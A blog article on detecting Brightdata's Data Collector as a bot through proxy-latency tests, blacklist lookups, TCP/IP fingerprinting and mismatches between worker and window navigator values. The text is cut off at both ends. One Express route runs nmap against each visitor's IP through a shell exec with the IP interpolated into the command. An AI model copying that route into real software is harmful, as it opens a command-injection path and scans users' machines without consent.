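// ASSUMPTION: the default threshold of 0.3 is picked by eye from the
// samples in this article, it is not a calibrated value.
function looksLikeProxy(tcpRtts, wsRtts, threshold = 0.3) {
  return rttDifference(tcpRtts, wsRtts) > threshold;
}

// First Brightdata row (135.8ms vs 231ms) from the table above.
console.log(looksLikeProxy([135.8], [231]));   // true
// A "No Proxy" row (207.9ms vs 236.7ms) from the table above.
console.log(looksLikeProxy([207.9], [236.7])); // false
```

<p>Passing several samples per visitor and taking the median reduces the influence of single outliers.</p>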
<p>Some things to keep in mind:</p>
<ul>
<li>Sometimes, the latencies obtained from WebSockets have outliers. I assume that this is due to packet loss and retransmission (WebSockets run on top of TCP, which is a reliable protocol).</li>
<li>The downside of TCP/IP handshake RTTs is that packet loss may occur there as well and skew the latency measurements. But because a browser usually makes a couple of TCP/IP handshakes when it visits my website, I can take the median value there as well.</li>
</ul>Detecting Brightdata's (formerly Luminati Networks) Data Collector as a Bot2021-06-05T17:45:00+02:002021-06-06T12:46:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-05:/2021/06/05/detecting-brightdata-data-collector-as-bot/<p>In this blog article I demonstrate several bullet-proof ways how to detect <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> as a bot without any doubt.</p><h1>TL;DR</h1>
<p>It's very easy to detect <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> as a bot. Brightdata's former name was Luminati Networks.</p>
<p>The four most important findings that expose their data collector as a bot:</p>
<ol>
<li>It's easy to demonstrate that the <code>navigator</code> object is heavily spoofed by comparing certain <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Using_web_workers">Web Worker</a> <code>navigator</code> properties and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Service_Worker_API">Service Worker</a> <code>navigator</code> properties to the DOM's <code>window.navigator</code> properties (such as <code>navigator.userAgent</code> or <code>navigator.platform</code>). Furthermore, it's possible to see that <code>HeadlessChrome</code> as a browser and <code>Linux x86_64</code> as a platform are used.</li>
<li>By comparing the network latencies from browser to server and from server to external IP address, it's possible to infer that proxies are used. Furthermore, the external IPs of <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> answer to ICMP ping packets (sometimes).</li>
<li>The TCP/IP fingerprint recorded with my own tool <a href="https://github.com/NikolaiT/zardaxt">zardaxt.py</a> indicates a different operating system (mostly Linux) than what is advertised in the HTTP User Agent header (which is mostly Windows 10).</li>
<li>It's possible to detect that the canvas <code>getImageData()</code> method was spoofed. There are several spoofing mechanisms and anti-canvas fingerprinting defenses that should not occur with real browsers.</li>
</ol>
<h1>Introduction</h1>
<p><a href="https://brightdata.com/">Brightdata</a> (formerly <em>Luminati Networks</em>) is probably the largest proxy provider on the planet.</p>
<p>Their main product is a large proxy network. They offer datacenter, residential and mobile proxies. They can do so because their sister company <a href="https://hola.org/">hola.org</a> provides a browser extension that allows users to share their network bandwidth with other users of <a href="https://hola.org/">hola.org</a>. It's a peer-to-peer network that allows its often unaware clients to change their IP address to circumvent geo-blocking or remain anonymous. If you are not from Europe or the US, you very often have to endure ridiculous geo-blocking. That's why such services and VPN providers are in huge demand.</p>
<p>Put differently: <a href="https://hola.org/">hola.org</a> installs a proxy server on each person's computer/mobile phone and <a href="https://brightdata.com/">Brightdata</a> resells this bandwidth as residential and mobile proxies to large business customers. There is no such thing as a free service. If it's free, then you are the product.</p>
<p>But most recently, <a href="https://brightdata.com/">Brightdata</a> also strongly pushed into the data collection niche (data as a service) by allowing their clients access to a full fledged browser with JavaScript capabilities that is hard to distinguish from a real human controlled browser. This service is called <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> and is the center of attention in this blog article.</p>
<figure>
<img src="https://incolumitas.com/images/brightdata.png" alt="Brightdata data collector" />
<figcaption>Brightdata data collector - Or: Best solution for sneaker bots?</figcaption>
</figure>
<p>As Brightdata's product marketing image above suggests, the data collector can be used to scrape search engines, prices from e-commerce websites, or the most recently published real estate listings on realtor websites. If you have an advanced undetectable bot, you have an enormous advantage on the Internet, because speed and automation are often a huge advantage in transactions where demand is high and supply is low.</p>
<p>In this blog post, my goal is to find some reliable ways to detect <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> as a bot.</p>
<h1>Approach</h1>
<p>I will use the following bot detection sites and visit them with <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>. Put differently: Instead of scraping an arbitrary site such as Google, I will let the bot visit a bot detection site and investigate the results of the detection site.</p>
<ol>
<li><a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a></li>
<li><a href="https://pixelscan.net/">pixelscan.net</a></li>
<li><a href="https://whatleaks.com/">whatleaks.com</a></li>
<li><a href="http://f.vision/">f.vision</a></li>
</ol>
<p>For each detection reported by these sites, I will try to re-implement the test that triggered it. Only when I am capable of re-implementing the detection test do I truly understand why a site claims to have detected the visitor as a bot, and only then am I able to form my own judgement.</p>
<p>For each bot detection site listed above, I will request the site five times.</p>
<h1>Testing with whatleaks.com</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/whatleaks">is a link</a> to the <a href="https://whatleaks.com/">whatleaks.com</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://whatleaks.com'</span><span class="p">);</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#doesNOtExit'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">})</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/whatLeaks.png" alt="Brightdata data collector" />
<figcaption>This is what the whatleaks.com results page looks like.</figcaption>
</figure>
<h4>Result 1: Data Collector IP found in Spam Blacklist</h4>
<p><a href="https://whatleaks.com/">whatleaks.com</a> claims: </p>
<div class="highlight"><pre><span></span><code><span class="n">Result</span><span class="o">:</span><span class="w"></span>
<span class="n">IP</span><span class="w"> </span><span class="n">found</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">blacklists</span><span class="w"> </span><span class="o">(</span><span class="mi">1</span><span class="o">)</span><span class="w"></span>
<span class="n">Name</span><span class="w"></span>
<span class="n">Description</span><span class="w"></span>
<span class="n">dnsbl</span><span class="o">.</span><span class="na">sorbs</span><span class="o">.</span><span class="na">net</span><span class="o">:</span><span class="w"></span>
<span class="n">Unsolicited</span><span class="w"> </span><span class="n">bulk</span><span class="o">/</span><span class="n">commercial</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">senders</span><span class="w"></span>
</code></pre></div>
<p>When looking up the IP address <code>184.91.1.148</code> on <a href="https://www.dnsbl.info/dnsbl-database-check.php">dnsbl.info</a> I can confirm the finding.</p>
<figure>
<img src="https://incolumitas.com/images/dnsbl.png" alt="Brightdata data collector" />
<figcaption>Brightdata IP address is listed on https://www.dnsbl.info/dnsbl-database-check.php</figcaption>
</figure>
<p>I have no idea how accurate <a href="https://www.dnsbl.info/dnsbl-database-check.php">dnsbl.info</a> is, but as a quick check, I looked up my own public IP address and there is also one spam report for my very own ISP IP (detected on <code>b.barracudacentral.org</code>). So I would not consider those publicly accessible spam lookup databases as overly trustworthy.</p>
<p>With the other IP addresses of the other four samples I got a similar result.</p>
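<p>Such blacklists are usually queried over DNS: the octets of the IPv4 address are reversed, the blacklist zone is appended, and an existing A record means that the IP is listed. The following is a minimal sketch of that lookup. The function names are my own, and I am assuming that the zone behaves like a standard DNSBL. It is not how whatleaks.com or dnsbl.info implement their checks.</p>

```javascript
// Builds the DNS name that a DNSBL lookup queries for an IPv4 address:
// the octets are reversed and the blacklist zone is appended.
function dnsblQueryName(ip, zone) {
  const octets = ip.split('.');
  const valid = octets.length === 4 &&
    octets.every((o) => /^\d{1,3}$/.test(o) && Number(o) <= 255);
  if (!valid) {
    throw new Error(`Not an IPv4 address: ${ip}`);
  }
  return `${octets.reverse().join('.')}.${zone}`;
}

// Resolves to true if the zone returns an A record for the IP (listed)
// and to false if the name does not exist (not listed).
// Needs Node.js and network access, so it is only defined here, not called.
async function isListed(ip, zone) {
  const { resolve4 } = await import('node:dns/promises');
  try {
    await resolve4(dnsblQueryName(ip, zone));
    return true;
  } catch (err) {
    if (err.code === 'ENOTFOUND' || err.code === 'ENODATA') return false;
    throw err;
  }
}

console.log(dnsblQueryName('184.91.1.148', 'dnsbl.sorbs.net'));
// 148.1.91.184.dnsbl.sorbs.net
```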
<h4>Result 2: Ping - Proxy usage detected in Connection</h4>
<p>When looking up the test description on <a href="https://whatleaks.com/">whatleaks.com</a>:</p>
<blockquote>
<p>We compare ping from your computer to our server and ping from our server to the host of your external IP. If the difference is too much then there is probably a tunnel and you are using a proxy.</p>
</blockquote>
<p>I re-implemented this ping proxy detection test in <a href="https://incolumitas.com/2021/04/24/detecting-proxies/">my last blog article</a> where I also quickly programmed my own test. Link to my own ping-based proxy detection test: <a href="https://bot.incolumitas.com/crossping.html">bot.incolumitas.com/crossping.html</a></p>
<p>For example, those are the results of the crossping test when letting <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> visit my <a href="https://bot.incolumitas.com/crossping.html">crossping test site</a>:</p>
<p>Test Run 1:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mf">914.4649999216199</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mf">1014.5399998873472</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">1015.4400002211332</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">1101.740000769496</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">1102.8800001367927</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 134.796 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 131.744 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 133.993 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 139.276 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 137.525 ms"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Test Run 2:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mf">717.8099993616343</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">959.8300000652671</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">962.6200003549457</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mf">1128.740000538528</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">1131.4850002527237</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 93.502 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.907 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.825 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.782 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.935 ms"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>And this is me with my own Laptop and Browser and without any proxy visiting my detection site:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mi">107</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mi">114</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">116.59999999962747</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">119.80000000074506</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">190.09999999962747</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As you can see, the ping time for <code>browserToServer</code> is significantly higher for <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> compared to my own browser (without any bot). And of course I cannot ping my own IP address <code>84.152.212.142</code> from my webserver, because I am behind a NAT.</p>
<p>If I really need reliable <code>serverToExternalIP</code> measurements, I could obtain correct latencies for <code>serverToExternalIP</code> by measuring the TCP handshake RTT.</p>
<p>So what can we say from the tests above? </p>
<p>In both cases when using <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>, the latencies were quite high at around 1 second. This stands in contrast to very small latencies of around 100ms when visiting the test with my own browser without any proxy. Of course, geolocation-induced latencies need to be kept in mind, but usually they don't add up to more than 200ms - 300ms.</p>
<p>In conclusion I can say that I am quite confident that it must be possible to apply some statistics and make a statement such as: The <code>browserToServer</code> latencies are significantly higher than the <code>serverToExternalIP</code> latencies and therefore we can conclude that there must be some intermediary in the connection!</p>
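<p>As a first step towards such a statistic, the crossping results can be reduced to two medians and their ratio. The sketch below is only an illustration: the function names are mine, and the ratio is a rough indicator, because <code>browserToServer</code> and the ICMP ping in <code>serverToExternalIP</code> do not measure exactly the same thing.</p>

```javascript
// Median of a list of latency samples in milliseconds.
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1
    ? sorted[mid]
    : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Splits one crossping result object into its two latency series
// and returns both medians and their ratio.
function summarizeCrossping(result) {
  const browser = [];
  const server = [];
  for (const [key, value] of Object.entries(result)) {
    if (key.startsWith('browserToServer-')) {
      browser.push(value);
    } else if (key.startsWith('serverToExternalIP-')) {
      // Successful pings look like "72.180.224.177 - OK 134.796 ms".
      // Failed pings ("... - FAIL") carry no latency and are skipped.
      const match = /OK ([\d.]+) ms$/.exec(value);
      if (match) server.push(Number(match[1]));
    }
  }
  const browserMedian = browser.length ? median(browser) : null;
  const serverMedian = server.length ? median(server) : null;
  const ratio = browserMedian !== null && serverMedian !== null
    ? browserMedian / serverMedian
    : null;
  return { browserMedian, serverMedian, ratio };
}

// Values copied from "Test Run 1" above.
const testRun1 = {
  'browserToServer-0': 914.4649999216199,
  'browserToServer-1': 1014.5399998873472,
  'browserToServer-2': 1015.4400002211332,
  'browserToServer-3': 1101.740000769496,
  'browserToServer-4': 1102.8800001367927,
  'serverToExternalIP-0': '72.180.224.177 - OK 134.796 ms',
  'serverToExternalIP-1': '72.180.224.177 - OK 131.744 ms',
  'serverToExternalIP-2': '72.180.224.177 - OK 133.993 ms',
  'serverToExternalIP-3': '72.180.224.177 - OK 139.276 ms',
  'serverToExternalIP-4': '72.180.224.177 - OK 137.525 ms',
};

console.log(summarizeCrossping(testRun1).ratio.toFixed(1)); // prints 7.5
```

<p>When all pings fail, as with my own laptop behind a NAT, <code>ratio</code> is <code>null</code> and no statement can be made from this test alone.</p>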
<h4>Result 3: Data Collector IP has Open Ports</h4>
<p>I implemented a simple portscan route on my Express web server:</p>
<div class="highlight"><pre><span></span><code><span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/portscan'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// port scan the external IP address</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">command</span> <span class="o">=</span> <span class="sb">`nmap -p3389,5900,5901,5938,5939,5279 </span><span class="si">${</span><span class="nx">ip</span><span class="si">}</span><span class="sb"> 2>&1`</span><span class="p">;</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">exec</span><span class="p">(</span><span class="nx">command</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span><span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">ip</span> <span class="o">+</span> <span class="s1">' - '</span> <span class="o">+</span> <span class="nx">stdout</span><span class="p">.</span><span class="nx">trim</span><span class="p">());</span>
<span class="p">});</span>
</code></pre></div>
<p>Test site: <a href="https://abs.incolumitas.com/portscan">portscan</a></p>
<p><a href="https://whatleaks.com/">whatleaks.com</a> claims that <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> has open ports:</p>
<figure>
<img src="https://incolumitas.com/images/whatLeaksPorts.png" alt="Several Open Ports detected by whatleaks.com" />
<figcaption>Several Open Ports detected by whatleaks.com</figcaption>
</figure>
<p>I could reproduce those findings with my portscan method above. See the image below for proof:</p>
<figure>
<img src="https://incolumitas.com/images/portscanWL.png" alt="Several Open Ports detected by my port scanning function" />
<figcaption>Several Open Ports detected by my port scanning function</figcaption>
</figure>
<p>I assume that Brightdata defends against port scanning with restrictive <code>iptables</code> rules, which is why I only get <code>filtered</code> as a result. But undoubtedly, those ports are open.</p>
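<p>To work with the scan result programmatically, the <code>stdout</code> of the portscan route above can be parsed into one entry per port. nmap itself distinguishes between states such as <code>open</code>, <code>closed</code> and <code>filtered</code>, where <code>filtered</code> means that packet filtering prevented nmap from determining the state. The following parser is a small sketch. The function name is mine and the sample input is purely illustrative, it is not the output of a real scan.</p>

```javascript
// Extracts port, protocol, state and service from nmap's normal output.
function parseNmapPorts(stdout) {
  const ports = [];
  for (const line of stdout.split('\n')) {
    // Port lines look like "3389/tcp filtered ms-wbt-server".
    const match = /^(\d+)\/(tcp|udp)\s+(\S+)\s+(\S+)/.exec(line.trim());
    if (match) {
      ports.push({
        port: Number(match[1]),
        protocol: match[2],
        state: match[3],
        service: match[4],
      });
    }
  }
  return ports;
}

// ILLUSTRATIVE input only, not a real scan result.
const sample = [
  'PORT     STATE    SERVICE',
  '3389/tcp filtered ms-wbt-server',
  '5900/tcp filtered vnc',
].join('\n');

for (const { port, state, service } of parseNmapPorts(sample)) {
  console.log(`${port} (${service}): ${state}`);
}
```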
<h4>Result 4: Data Collector's TCP/IP Fingerprint different from claimed Browser User Agent</h4>
<p>I will use my own TCP/IP fingerprinting tool named <a href="https://github.com/NikolaiT/zardaxt/">zardaxt.py</a> to conduct this test. </p>
<p>Link to the TCP/IP detection test site: <a href="https://bot.incolumitas.com/tcpip.html">bot.incolumitas.com/tcpip.html</a></p>
<p>When visiting the <a href="https://whatleaks.com/">whatleaks.com</a> test site with <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>, the site detects a passive OS fingerprint of <code>Linux</code> but a <code>Windows</code> OS according to the User Agent.</p>
<figure>
<img src="https://incolumitas.com/images/wlfp.png" alt="TCP/IP fingerprint OS differs from User Agent OS on whatleaks.com" />
<figcaption>Linux as detected by the TCP/IP fingerprint, but User Agent says Windows</figcaption>
</figure>
<p>Replication: When testing <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> three times with my <a href="https://bot.incolumitas.com/tcpip.html">own TCP/IP fingerprinting tool</a>, I get the following results:</p>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt1.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here it is quite obvious that the User Agent OS is different compared to the TCP/IP fingerprint OS. The TCP/IP fingerprint is most likely Linux.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt2.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here zardaxt.py fails to make a convincing statement. However, the score for Windows is the lowest, although the User Agent says it's a Windows device...</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt3.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here the User Agent OS matches the suggested TCP/IP fingerprint OS. This one looks legit.</figcaption>
</figure>
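<p>The comparison behind this test boils down to two OS guesses that have to agree. Below is a minimal sketch of that logic. Note the assumptions: the shape of <code>scores</code> (OS name mapped to a similarity score, higher is better) is hypothetical and not the actual output format of zardaxt.py, and the score values in the example are made up for illustration.</p>

```javascript
// Rough OS guess from a User-Agent string. The order matters: Android
// UAs also contain "Linux" and iOS UAs contain "like Mac OS X".
function osFromUserAgent(userAgent) {
  if (/Windows NT/.test(userAgent)) return 'Windows';
  if (/Android/.test(userAgent)) return 'Android';
  if (/iPhone|iPad/.test(userAgent)) return 'iOS';
  if (/Mac OS X/.test(userAgent)) return 'macOS';
  if (/Linux/.test(userAgent)) return 'Linux';
  return 'unknown';
}

// ASSUMPTION: `scores` maps OS names to similarity scores, higher means
// a better match. This is a hypothetical format.
function osFromFingerprint(scores) {
  let best = null;
  for (const [os, score] of Object.entries(scores)) {
    if (best === null || score > best.score) best = { os, score };
  }
  return best ? best.os : 'unknown';
}

// Flags a mismatch only when both sides produced a usable guess.
function osMismatch(userAgent, scores) {
  const claimed = osFromUserAgent(userAgent);
  const observed = osFromFingerprint(scores);
  const mismatch =
    claimed !== 'unknown' && observed !== 'unknown' && claimed !== observed;
  return { claimed, observed, mismatch };
}

// Example with a Windows 10 Chrome User-Agent and made-up scores.
const ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' +
  '(KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36';
console.log(osMismatch(ua, { Linux: 8, macOS: 4, Windows: 3 }));
```

<p>In practice, a close race between the scores (as in my second sample above) should probably be treated as inconclusive rather than as a mismatch.</p>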
<h1>Testing with creepjs</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/creepjs">is a link</a> to the <a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3) > div:nth-child(2) a'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3) > div:nth-child(2) a'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>CreepJS is really devastating in its opinion about <a href="https://brightdata.com/products/data-collector">Brightdata data collector</a>. It gives a trust score of <strong>0%</strong>, see the image below:</p>
<figure>
<img src="https://incolumitas.com/images/creepJS.png" alt="creepjs results page" />
<figcaption>This is what the creepjs results page looks like. The data collector gets the worst trust score possible.</figcaption>
</figure>
<p>The <a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a> bot detection site is a gold mine. Even better, the library is <a href="https://github.com/abrahamjuliot/creepjs">open source</a>.</p>
<p>There are so many findings, it's hard to list them all. Let's get started:</p>
<h4>Result 1: Service Worker navigator differs from main navigator</h4>
<figure>
<img src="https://incolumitas.com/images/creepSW.png" alt="creepjs results page" />
<figcaption>creepjs reports that Service Worker navigator properties show the un-spoofed values for the real navigator property</figcaption>
</figure>
<p>In short, modern browsers have something called <a href="https://developers.google.com/web/fundamentals/primers/service-workers">Service Workers</a>. A Service Worker is basically a proxy layer that sits between the web application and the server and adds offline-mode features (amongst others).</p>
<p>In the context of <a href="https://developers.google.com/web/fundamentals/primers/service-workers">Service Workers</a>, there is also a <code>navigator</code> property.</p>
<p>My claim (and of course creepjs's claim) is: The bot programmers forgot to spoof those values like they did with the main <code>navigator</code> property.</p>
<p>Therefore, I implemented a test that compares the <code>navigator</code> values from the DOM with the values from the Service Worker context. Link to test: <a href="https://bot.incolumitas.com/sw.html">https://bot.incolumitas.com/sw.html</a></p>
<p>This is the result:</p>
<figure>
<img src="https://incolumitas.com/images/sw-mismatch.png" alt="creepjs results page" />
<figcaption>boom - detected</figcaption>
</figure>
<p>Do you see what I see?</p>
<p>The bot claims to be <code>Win32</code> but is <code>Linux x86_64</code> when inspecting <code>navigator.platform</code>.</p>
<p>The bot claims to be <code>Chrome/90.0.4430.72</code> but is <code>HeadlessChrome/90.0.4430.93</code> when inspecting <code>navigator.userAgent</code>.</p>
<p>Totally busted.</p>
<h4>Result 2: Web Worker navigator differs from main navigator</h4>
<p>Same logic here, except that <a href="https://brightdata.com/products/data-collector">Brightdata data collector</a> spoofs a bit more with <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API">Web Workers</a>, so it's less fatal, but still enough to detect them as a bot.</p>
<p>Link to test: <a href="https://bot.incolumitas.com/ww.html">https://bot.incolumitas.com/ww.html</a></p>
<figure>
<img src="https://incolumitas.com/images/ww-mismatch.png" alt="creepjs results page" />
<figcaption>boom - detected</figcaption>
</figure>
<p>Same as with Service Workers above, the bot claims to be <code>Win32</code> but is <code>Linux x86_64</code> when inspecting <code>navigator.platform</code>.</p>
<p>The User Agent is correctly spoofed, unlike with Service Workers above.</p>
<p>But <code>["en-US"]</code> as taken from <code>navigator.languages</code> is different to <code>["en-US","en"]</code>.</p>
<p>It's enough to see that the browser <em>lies</em>. The values are not consistent.</p>
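<p>The idea behind both worker tests can be sketched in a few lines. This is not the code of my test pages or of creepjs, just a minimal illustration with names I made up: read the same <code>navigator</code> properties in the window and inside a dedicated Web Worker, then report every property that differs. The same comparison applies to Service Workers, only the way to obtain the worker-side values differs.</p>

```javascript
// Names of the navigator properties to compare.
const PROPS = ['userAgent', 'platform', 'languages', 'hardwareConcurrency'];

// Returns the property names whose values differ between two snapshots.
function findMismatches(windowNav, workerNav) {
  return PROPS.filter(
    (prop) => JSON.stringify(windowNav[prop]) !== JSON.stringify(workerNav[prop])
  );
}

// Browser only: reads the same properties inside a dedicated Web Worker
// that is created from an inline script.
function collectWorkerNavigator() {
  const source = `
    const props = ${JSON.stringify(PROPS)};
    const snapshot = {};
    for (const p of props) snapshot[p] = navigator[p];
    self.postMessage(snapshot);
  `;
  const url = URL.createObjectURL(
    new Blob([source], { type: 'application/javascript' })
  );
  return new Promise((resolve, reject) => {
    const worker = new Worker(url);
    worker.onmessage = (event) => {
      resolve(event.data);
      worker.terminate();
      URL.revokeObjectURL(url);
    };
    worker.onerror = reject;
  });
}

// Browser only: compares window.navigator with the worker's navigator.
// An empty array means that the checked properties are consistent.
async function detectNavigatorSpoofing() {
  const windowNav = {};
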